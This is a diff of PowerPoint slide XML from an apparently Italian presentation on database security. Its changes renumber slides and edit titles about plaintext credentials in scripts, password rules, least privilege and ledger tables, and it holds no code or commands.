+            <a:pPr lvl="0" algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Estrarre</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> le </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>credenziali</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> in </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>chiaro</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> da uno script</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="129" name="Google Shape;129;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6B3B25B-C446-2F2F-4DCF-87F45774B230}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="4" name="Picture 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CFB3EA5-5B3F-5E47-D8A7-457F41FAABD7}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId4"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1688631" y="2027670"/>
+            <a:ext cx="5766738" cy="2180183"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="2" name="Picture 1" descr="A pair of handcuffs on a black background&#10;&#10;AI-generated content may be incorrect.">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60E8B240-5C2C-E519-A89D-434A5EE7E3C5}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId5"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3580702" y="2225258"/>
+            <a:ext cx="1982595" cy="1982595"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4244016731"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide36.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -22138,7 +23243,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide35.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide37.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -22195,7 +23300,7 @@
             <a:pPr lvl="0" algn="ctr"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Recuperare</a:t>
+              <a:t>Elencare</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -22215,7 +23320,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t> database del server</a:t>
+              <a:t> database</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -22499,7 +23604,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide36.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide38.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -22842,7 +23947,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide37.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide39.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -23185,7 +24290,236 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide38.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide4.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 118"/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="119" name="Google Shape;119;p30"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2472833" y="1497613"/>
+            <a:ext cx="4198334" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en" dirty="0"/>
+              <a:t>Una buona password…</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="120" name="Google Shape;120;p30"/>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="121" name="Google Shape;121;p30"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1128450" y="2182797"/>
+            <a:ext cx="6887100" cy="2243867"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+              <a:buFont typeface="Barlow Condensed"/>
+              <a:buChar char="●"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0"/>
+              <a:t>8+ </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
+              <a:t>caratteri</a:t>
+            </a:r>
+            <a:endParaRPr sz="1600" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+              <a:buFont typeface="Barlow Condensed"/>
+              <a:buChar char="●"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en" sz="1600" dirty="0"/>
+              <a:t>Lettere minuscole e maiuscole</a:t>
+            </a:r>
+            <a:endParaRPr sz="1600" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+              <a:buChar char="●"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en" sz="1600" dirty="0"/>
+              <a:t>Numeri</a:t>
+            </a:r>
+            <a:endParaRPr sz="1600" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" lvl="0" indent="-330200">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+              <a:buChar char="●"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
+              <a:t>Caratteri</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
+              <a:t>speciali</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1600" dirty="0"/>
+            </a:br>
+            <a:endParaRPr sz="1600" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="FF0000"/>
+              </a:solidFill>
+              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide40.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -23250,7 +24584,15 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Una query semplice </a:t>
+              <a:t>Una query </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>innocua</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
@@ -23353,7 +24695,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide39.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide41.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -23410,7 +24752,15 @@
             <a:pPr lvl="0" algn="ctr"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Una query semplice </a:t>
+              <a:t>Una query </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>innocua</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
@@ -23663,236 +25013,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide4.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 118"/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="119" name="Google Shape;119;p30"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="2472833" y="1497613"/>
-            <a:ext cx="4198334" cy="572700"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en" dirty="0"/>
-              <a:t>Una buona password…</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="120" name="Google Shape;120;p30"/>
-          <p:cNvPicPr preferRelativeResize="0"/>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId3">
-            <a:alphaModFix/>
-          </a:blip>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4116500" y="448013"/>
-            <a:ext cx="911000" cy="911000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-      </p:pic>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="121" name="Google Shape;121;p30"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title" idx="2"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1128450" y="2182797"/>
-            <a:ext cx="6887100" cy="2243867"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="115000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:srgbClr val="D93232"/>
-              </a:buClr>
-              <a:buSzPts val="1600"/>
-              <a:buFont typeface="Barlow Condensed"/>
-              <a:buChar char="●"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0"/>
-              <a:t>8+ </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
-              <a:t>caratteri</a:t>
-            </a:r>
-            <a:endParaRPr sz="1600" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="115000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:srgbClr val="D93232"/>
-              </a:buClr>
-              <a:buSzPts val="1600"/>
-              <a:buFont typeface="Barlow Condensed"/>
-              <a:buChar char="●"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en" sz="1600" dirty="0"/>
-              <a:t>Lettere minuscole e maiuscole</a:t>
-            </a:r>
-            <a:endParaRPr sz="1600" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="115000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:srgbClr val="D93232"/>
-              </a:buClr>
-              <a:buSzPts val="1600"/>
-              <a:buChar char="●"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en" sz="1600" dirty="0"/>
-              <a:t>Numeri</a:t>
-            </a:r>
-            <a:endParaRPr sz="1600" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="457200" lvl="0" indent="-330200">
-              <a:lnSpc>
-                <a:spcPct val="115000"/>
-              </a:lnSpc>
-              <a:buClr>
-                <a:srgbClr val="D93232"/>
-              </a:buClr>
-              <a:buSzPts val="1600"/>
-              <a:buChar char="●"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
-              <a:t>Caratteri</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
-              <a:t>speciali</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1600" dirty="0"/>
-            </a:br>
-            <a:endParaRPr sz="1600" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="FF0000"/>
-              </a:solidFill>
-              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide40.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide42.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -23933,8 +25054,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1893525" y="1490741"/>
-            <a:ext cx="5356950" cy="572700"/>
+            <a:off x="647952" y="1490741"/>
+            <a:ext cx="7848095" cy="572700"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -23956,10 +25077,10 @@
               <a:buNone/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en" dirty="0"/>
-              <a:t>Altri accorgimenti: utente dedicato</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
+              <a:rPr lang="en" sz="2400" dirty="0"/>
+              <a:t>Altri accorgimenti: utente dedicato, least privilege</a:t>
+            </a:r>
+            <a:endParaRPr sz="2400" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -23997,12 +25118,308 @@
           </a:ln>
         </p:spPr>
       </p:pic>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="8" name="Picture 7">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37F88177-6642-C600-E0E4-F28053B234AF}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId4"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1926135" y="2063441"/>
+            <a:ext cx="6202729" cy="2481091"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="241180902"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide43.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 118">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11DAA30C-0B39-C748-D4D4-5684AF42BCFF}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="119" name="Google Shape;119;p30">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BDA0967-4F3B-78E3-0408-375C8A6861BA}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1893525" y="1490741"/>
+            <a:ext cx="5356950" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en" dirty="0"/>
+              <a:t>Altri accorgimenti: ledger tables</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="120" name="Google Shape;120;p30">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4325C7B-EC94-C01F-7DB8-1DBC522F9501}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="3" name="Picture 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD44FAEA-2793-0A9B-415B-EBB61A6662D4}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId4"/>
+          <a:stretch>
+            <a:fillRect/>
